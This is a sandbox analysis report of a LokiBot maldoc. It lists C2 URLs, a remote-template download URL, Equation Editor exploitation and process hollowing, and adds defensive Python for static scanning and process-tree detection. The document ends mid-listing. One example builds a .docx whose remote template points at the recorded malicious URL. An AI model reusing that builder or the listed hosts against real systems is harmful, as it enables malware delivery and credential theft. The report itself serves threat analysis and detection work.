Analysis
  max time kernel: 102s
  max time network: 105s
  platform: windows7_x64
  resource: win7-20230220-en
  resource tags: arch:x64, arch:x86, image:win7-20230220-en, locale:en-us, os:windows7-x64, system
  submitted: 22-02-2023 18:42
Static task: static1
Behavioral tasks (sample RE PO02366.docx on each resource):
  behavioral1: win10-20230220-en
  behavioral2: win7-20230220-en
  behavioral3: win10v2004-20230220-en
The results on this page are from the win7-20230220-en run (the resource named under Analysis); the Office14 paths and Wow6432Node keys in the signatures are consistent with that 64-bit Windows 7 image running 32-bit Office 2010.
General
  Target: RE PO02366.docx
  Size: 10KB
  MD5: 352573ea247c865918062df15a57fd90
  SHA1: 69699e27cfc37916b60c5b63340c550f1750810d
  SHA256: 0fc64d847655fe5a6f90a06fbb2ca5f5e4848701c4f18c1d2cda39aca390952e
  SHA512: 8ef10f279da88da64d69d58843d875d4d922438e09eb3896a2392ebc91b1b9dcca27fa3acaba52cc2d0403c365dac139a583378cd4ecdcc41471e7227ad13f8b
  SSDEEP: 192:ScIMmtP0xfUW70vG/b3kgOi4OUdVuus+1pReDnc37yCdt:SPX+si10ni4OiVMyeDnMuCr
Malware Config
Extracted family: lokibot
C2 URLs:
  http://208.67.105.148/sung/five/fre.php
  http://kbfvzoboss.bid/alien/fre.php
  http://alphastand.trade/alien/fre.php
  http://alphastand.win/alien/fre.php
  http://alphastand.top/alien/fre.php
Note: the four alien/fre.php URLs are the hard-coded fallback entries carried by widely circulated cracked LokiBot builds and turn up in most samples; when blocking or pivoting, treat the 208.67.105.148 URL as the entry specific to this build.
Signatures

Blocklisted process makes network request (1 IoC)
  flow | pid | process
  7 | 924 | EQNEDT32.EXE

Downloads MZ/PE file

Abuses OpenXML format to download file from external location (2 IoCs)
  description | ioc | process
  Key opened | \REGISTRY\USER\S-1-5-21-1283023626-844874658-3193756055-1000\Software\Microsoft\Office\Common\Offline\Files\http://3235029245/OO-OO-OO.DOC | WINWORD.EXE
  Key opened | \REGISTRY\USER\S-1-5-21-1283023626-844874658-3193756055-1000\Software\Microsoft\Office\14.0\Common | WINWORD.EXE
  Note: the host 3235029245 is an IPv4 address written as a single 32-bit decimal (dword form); it decodes to 192.210.160.253, so blocklist matching must normalise the host before comparing. The fetched file is listed under Downloads as Content.IE5\TOS3MI7U\OO-OO-OO[1].doc (13KB).
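The signature above fires because the document carries an OOXML relationship whose target is external; that is visible statically, before Word ever runs. The following is an added example (not part of the sandbox report and not the sample's own contents): it builds a constructed minimal .docx in memory whose word/_rels/settings.xml.rels holds an external attachedTemplate relationship pointing at the URL the report recorded, then scans the package the way a mail gateway would, reporting every TargetMode="External" relationship and rewriting dword-form hosts such as 3235029245 to dotted-quad form. The part names and the XML are the standard OOXML layout; the sample's real internals are not shown on this page.

```python
"""Static triage for the 'OpenXML external download' signature.

Added example, not part of the sandbox report. Builds a constructed .docx
with a remote attachedTemplate relationship and scans it for external
relationships, normalising dword-form IPv4 hosts (e.g. http://3235029245/).
"""
import io
import ipaddress
import re
import xml.etree.ElementTree as ET
import zipfile
from urllib.parse import urlsplit, urlunsplit

PKG_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OFFICE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
WORD_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"


def normalise_host(url: str) -> str:
    """Rewrite a URL whose host is a bare decimal integer (dword-form IPv4)
    into dotted-quad form. Any other URL is returned unchanged."""
    parts = urlsplit(url)
    host = parts.hostname or ""
    if not re.fullmatch(r"\d+", host):
        return url
    try:
        ip = ipaddress.IPv4Address(int(host))   # rejects values above 2**32-1
    except ipaddress.AddressValueError:
        return url
    return urlunsplit(parts._replace(netloc=parts.netloc.replace(host, str(ip), 1)))


def external_relationships(docx_bytes: bytes) -> list:
    """Return every TargetMode="External" relationship in an OOXML package.
    Internal relationships (TargetMode absent or "Internal") are normal and skipped."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as pkg:
        for name in pkg.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(pkg.read(name))
            for rel in root.iter("{%s}Relationship" % PKG_NS):
                if rel.get("TargetMode") != "External":
                    continue
                target = rel.get("Target", "")
                findings.append({
                    "part": name,
                    "type": rel.get("Type", "").rsplit("/", 1)[-1],
                    "target": target,
                    "normalised": normalise_host(target),
                })
    return findings


def build_constructed_docx(template_url: str) -> bytes:
    """Constructed sample: the smallest .docx that makes Word fetch a remote
    template. It mirrors only the URL the report recorded, nothing else."""
    settings = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        '<w:settings xmlns:w="%s" xmlns:r="%s">'
        '<w:attachedTemplate r:id="rId1"/></w:settings>' % (WORD_NS, OFFICE_REL)
    )
    settings_rels = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        '<Relationships xmlns="%s"><Relationship Id="rId1" '
        'Type="%s/attachedTemplate" Target="%s" TargetMode="External"/>'
        '</Relationships>' % (PKG_NS, OFFICE_REL, template_url)
    )
    root_rels = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        '<Relationships xmlns="%s"><Relationship Id="rId1" '
        'Type="%s/officeDocument" Target="word/document.xml"/>'
        '</Relationships>' % (PKG_NS, OFFICE_REL)
    )
    document = '<w:document xmlns:w="%s"><w:body><w:p/></w:body></w:document>' % WORD_NS
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as pkg:
        pkg.writestr("_rels/.rels", root_rels)            # internal: not reported
        pkg.writestr("word/document.xml", document)
        pkg.writestr("word/settings.xml", settings)
        pkg.writestr("word/_rels/settings.xml.rels", settings_rels)   # external: reported
    return buf.getvalue()


if __name__ == "__main__":
    sample = build_constructed_docx("http://3235029245/OO-OO-OO.DOC")
    for hit in external_relationships(sample):
        print("%s: %s -> %s (%s)" % (hit["part"], hit["type"], hit["target"], hit["normalised"]))
```

Run against a real file, replace the constructed package with the bytes of the .docx under test; any attachedTemplate, oleObject, hyperlink or image relationship with an external target is worth a look, and the normalised host is what you feed to the blocklist.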
Executes dropped EXE (6 IoCs)
  pid | process
  1756 | vbc.exe
  1832 | vbc.exe
  1812 | vbc.exe
  1828 | vbc.exe
  1892 | vbc.exe
  1612 | vbc.exe

Loads dropped DLL (5 IoCs)
  pid | process
  924 | EQNEDT32.EXE (5 entries)
Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials etc.

Uses the VBS compiler for execution (1 TTP)
  Note: this signature keys on the process name vbc.exe. Here the image is the 847KB dropped payload at C:\Users\Public\vbc.exe (see Downloads), not the .NET Visual Basic compiler, which lives under C:\Windows\Microsoft.NET\Framework; the name is borrowed to blend in.
Accesses Microsoft Outlook profiles (1 TTP, 3 IoCs)
  description | ioc | process
  Key opened | \REGISTRY\USER\S-1-5-21-1283023626-844874658-3193756055-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | vbc.exe
  Key opened | \REGISTRY\USER\S-1-5-21-1283023626-844874658-3193756055-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook | vbc.exe
  Key opened | \REGISTRY\USER\S-1-5-21-1283023626-844874658-3193756055-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | vbc.exe

Suspicious use of SetThreadContext (1 IoC)
  description | pid | process | target process
  PID 1756 set thread context of 1612 | 1756 | vbc.exe | vbc.exe
  Note: combined with the WriteProcessMemory entries from 1756 into 1612 below, a parent resetting the thread context of a child running the same image is the process-hollowing pattern; the 648KB region at 0x400000-0x4A2000 dumped from PID 1612 (Downloads) is the injected image.

Drops file in Windows directory (1 IoC)
  description | ioc | process
  File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | WINWORD.EXE
Office loads VBA resources, possible macro or embedded object present

Launches Equation Editor (1 TTP, 1 IoC)
  Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

Modifies Internet Explorer settings
  Note: the Default HTML/MHTML Editor, MenuExt and Toolbar entries below are Word 2010's own first-run registrations on a fresh image, not attacker activity; they are listed for completeness.
  description | ioc | process
  Key created | \REGISTRY\USER\S-1-5-21-1283023626-844874658-3193756055-1000\Software\Microsoft\Internet Explorer\Toolbar | WINWORD.EXE
  Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND | WINWORD.EXE
  Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor | WINWORD.EXE
  Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 | WINWORD.EXE
  Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor | WINWORD.EXE
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit" | WINWORD.EXE
  Key created | \REGISTRY\USER\S-1-5-21-1283023626-844874658-3193756055-1000\Software\Microsoft\Internet Explorer\MenuExt | WINWORD.EXE
  Set value (str) | \REGISTRY\USER\S-1-5-21-1283023626-844874658-3193756055-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" | WINWORD.EXE
  Set value (int) | \REGISTRY\USER\S-1-5-21-1283023626-844874658-3193756055-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" | WINWORD.EXE
  Key created | \REGISTRY\USER\S-1-5-21-1283023626-844874658-3193756055-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel | WINWORD.EXE
  Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command | WINWORD.EXE
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" | WINWORD.EXE
  Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit | WINWORD.EXE
  Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit | WINWORD.EXE
  Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor | WINWORD.EXE
  Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell | WINWORD.EXE
  Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor | WINWORD.EXE
  Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell | WINWORD.EXE
  Set value (str) | \REGISTRY\USER\S-1-5-21-1283023626-844874658-3193756055-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" | WINWORD.EXE
  Set value (str) | \REGISTRY\USER\S-1-5-21-1283023626-844874658-3193756055-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" | WINWORD.EXE
  Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit | WINWORD.EXE
  Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell | WINWORD.EXE
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit" | WINWORD.EXE
  Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command | WINWORD.EXE
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" | WINWORD.EXE
  Key created | \REGISTRY\USER\S-1-5-21-1283023626-844874658-3193756055-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote | WINWORD.EXE
  Set value (int) | \REGISTRY\USER\S-1-5-21-1283023626-844874658-3193756055-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" | WINWORD.EXE
  Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit | WINWORD.EXE
  Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell | WINWORD.EXE
  Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND | WINWORD.EXE
  Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 | WINWORD.EXE
Modifies registry class (64 IoCs)
  Note: as with the Internet Explorer keys, the .htm/.mht OpenWithList, DDE and msohevi.dll icon-handler entries are Office's own file-association registration on first launch; none of them is attributable to the sample.
  description | ioc | process
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec | WINWORD.EXE
  Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 | WINWORD.EXE
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\ = "[open(\"%1\")]" | WINWORD.EXE
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe | WINWORD.EXE
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\application | WINWORD.EXE
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon\ = "\"%1\"" | WINWORD.EXE
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohevi.dll" | WINWORD.EXE
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ = "&Open" | WINWORD.EXE
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" | WINWORD.EXE
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" | WINWORD.EXE
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command | WINWORD.EXE
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec | WINWORD.EXE
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\ = "&Open" | WINWORD.EXE
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit | WINWORD.EXE
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit | WINWORD.EXE
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" | WINWORD.EXE
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\ = "[open(\"%1\")]" | WINWORD.EXE
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shellex\IconHandler\ = "{42042206-2D85-11D3-8CFF-005004838597}" | WINWORD.EXE
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\ = "&Open" | WINWORD.EXE
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic | WINWORD.EXE
  Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 | WINWORD.EXE
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\ = "&Print" | WINWORD.EXE
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell | WINWORD.EXE
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597} | WINWORD.EXE
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile | WINWORD.EXE
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" | WINWORD.EXE
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec | WINWORD.EXE
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command | WINWORD.EXE
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon | WINWORD.EXE
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command | WINWORD.EXE
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command | WINWORD.EXE
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\DefaultIcon | WINWORD.EXE
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel | WINWORD.EXE
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ = "&Open" | WINWORD.EXE
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\topic\ = "system" | WINWORD.EXE
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit | WINWORD.EXE
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic\ = "system" | WINWORD.EXE
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command | WINWORD.EXE
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\topic | WINWORD.EXE
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher | WINWORD.EXE
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32 | WINWORD.EXE
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe | WINWORD.EXE
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word | WINWORD.EXE
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application\ = "Excel" | WINWORD.EXE
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\application\ = "Excel" | WINWORD.EXE
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\ShellEx | WINWORD.EXE
  Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 | WINWORD.EXE
  Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command | WINWORD.EXE
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\application\ = "Excel" | WINWORD.EXE
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit | WINWORD.EXE
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command | WINWORD.EXE
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\ = "[open(\"%1\")]" | WINWORD.EXE
  Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 | WINWORD.EXE
  Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command | WINWORD.EXE
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word | WINWORD.EXE
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler | WINWORD.EXE
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print | WINWORD.EXE
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command | WINWORD.EXE
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\ = "[open(\"%1\")]" | WINWORD.EXE
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\ = "&Open" | WINWORD.EXE
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ = "&Open" | WINWORD.EXE
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application | WINWORD.EXE
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\ShellEx | WINWORD.EXE
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" | WINWORD.EXE
Suspicious behavior: AddClipboardFormatListener (1 IoC)
  pid | process
  2016 | WINWORD.EXE

Suspicious behavior: EnumeratesProcesses (8 IoCs)
  pid | process
  1756 | vbc.exe (8 entries)

Suspicious use of AdjustPrivilegeToken (3 IoCs)
  description | pid | process
  Token: SeDebugPrivilege | 1756 | vbc.exe
  Token: SeDebugPrivilege | 1612 | vbc.exe
  Token: SeShutdownPrivilege | 2016 | WINWORD.EXE

Suspicious use of SetWindowsHookEx (2 IoCs)
  pid | process
  2016 | WINWORD.EXE (2 entries)

Suspicious use of WriteProcessMemory (34 IoCs)
  description | pid | process | target process | entries
  PID 924 wrote to memory of 1756 | 924 | EQNEDT32.EXE | vbc.exe | 4
  PID 2016 wrote to memory of 1616 | 2016 | WINWORD.EXE | splwow64.exe | 4
  PID 1756 wrote to memory of 1832 | 1756 | vbc.exe | vbc.exe | 4
  PID 1756 wrote to memory of 1812 | 1756 | vbc.exe | vbc.exe | 4
  PID 1756 wrote to memory of 1828 | 1756 | vbc.exe | vbc.exe | 4
  PID 1756 wrote to memory of 1892 | 1756 | vbc.exe | vbc.exe | 4
  PID 1756 wrote to memory of 1612 | 1756 | vbc.exe | vbc.exe | 10
  Note: a group of four writes accompanies every ordinary process creation here, including the benign WINWORD.EXE to splwow64.exe pair, so those groups carry no signal on their own. The ten writes into 1612, paired with the SetThreadContext on the same PID, are the ones that indicate injection.

outlook_office_path (1 IoC)
  description | ioc | process
  Key opened | \REGISTRY\USER\S-1-5-21-1283023626-844874658-3193756055-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | vbc.exe

outlook_win_path (1 IoC)
  description | ioc | process
  Key opened | \REGISTRY\USER\S-1-5-21-1283023626-844874658-3193756055-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | vbc.exe
Processes
(indentation shows depth in the tree; PIDs are taken from the signature tables above)

WINWORD.EXE (PID 2016)
  "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\RE PO02366.docx"
    - Abuses OpenXML format to download file from external location
    - Drops file in Windows directory
    - Modifies Internet Explorer settings
    - Modifies registry class
    - Suspicious behavior: AddClipboardFormatListener
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory

  splwow64.exe (PID 1616)
    C:\Windows\splwow64.exe 12288

EQNEDT32.EXE (PID 924)
  "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
    - Blocklisted process makes network request
    - Loads dropped DLL
    - Launches Equation Editor
    - Suspicious use of WriteProcessMemory

  vbc.exe (PID 1756)
    "C:\Users\Public\vbc.exe"
      - Executes dropped EXE
      - Suspicious use of SetThreadContext
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory

    vbc.exe (PIDs 1832, 1812, 1828, 1892; four identical entries)
      "C:\Users\Public\vbc.exe"
        - Executes dropped EXE

    vbc.exe (PID 1612)
      "C:\Users\Public\vbc.exe"
        - Executes dropped EXE
        - Accesses Microsoft Outlook profiles
        - Suspicious use of AdjustPrivilegeToken
        - outlook_office_path
        - outlook_win_path

Read together with the signatures, the chain is: Word opens the 10KB .docx, which pulls http://3235029245/OO-OO-OO.DOC as a remote template; that document starts Equation Editor through COM (the -Embedding switch, which is why EQNEDT32.EXE appears as a root rather than as a child of WINWORD.EXE); EQNEDT32.EXE makes the blocklisted network request, drops C:\Users\Public\vbc.exe (847KB) and runs it; vbc.exe (1756) then writes into and resets the thread context of a fresh copy of itself (1612), consistent with process hollowing, and that final process is the one that reads Outlook profiles and matches the LokiBot config extractor. The 648KB region 0x400000-0x4A2000 dumped from PID 1612 (listed under Downloads) is the region to carve for the unpacked payload.
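The tree above is the pattern a detection engineer wants to alert on without relying on the sandbox's signatures. The following is an added example (not part of the sandbox report): it takes constructed Sysmon-style process-creation and cross-process records transcribed from this report's process tree and signature tables, and applies three rules: Equation Editor must never spawn a child; nothing executed from C:\Users\Public should have an Office process in its ancestry; and a parent that both writes into and sets the thread context of a child running the same image is treated as process hollowing. The report does not show EQNEDT32.EXE's parent (it is started by COM with -Embedding), so that ppid is left as None; the record layout and field names are this example's own, not the sandbox's.

```python
"""Process-tree rules for the Equation Editor -> C:\\Users\\Public chain.

Added example, not part of the sandbox report. PROCESS_EVENTS and API_EVENTS
are constructed Sysmon-style records transcribed from the report; ppid None
means the parent is not shown on the page.
"""
import ntpath

OFFICE_IMAGES = {"WINWORD.EXE", "EXCEL.EXE", "POWERPNT.EXE", "EQNEDT32.EXE"}
WORD = r"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"
EQNEDT = r"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"
VBC = r"C:\Users\Public\vbc.exe"

# Constructed from the report's process tree.
PROCESS_EVENTS = [
    {"pid": 2016, "ppid": None, "image": WORD,
     "cmdline": '"%s" /n "C:\\Users\\Admin\\AppData\\Local\\Temp\\RE PO02366.docx"' % WORD},
    {"pid": 1616, "ppid": 2016, "image": r"C:\Windows\splwow64.exe",
     "cmdline": r"C:\Windows\splwow64.exe 12288"},
    {"pid": 924, "ppid": None, "image": EQNEDT, "cmdline": '"%s" -Embedding' % EQNEDT},
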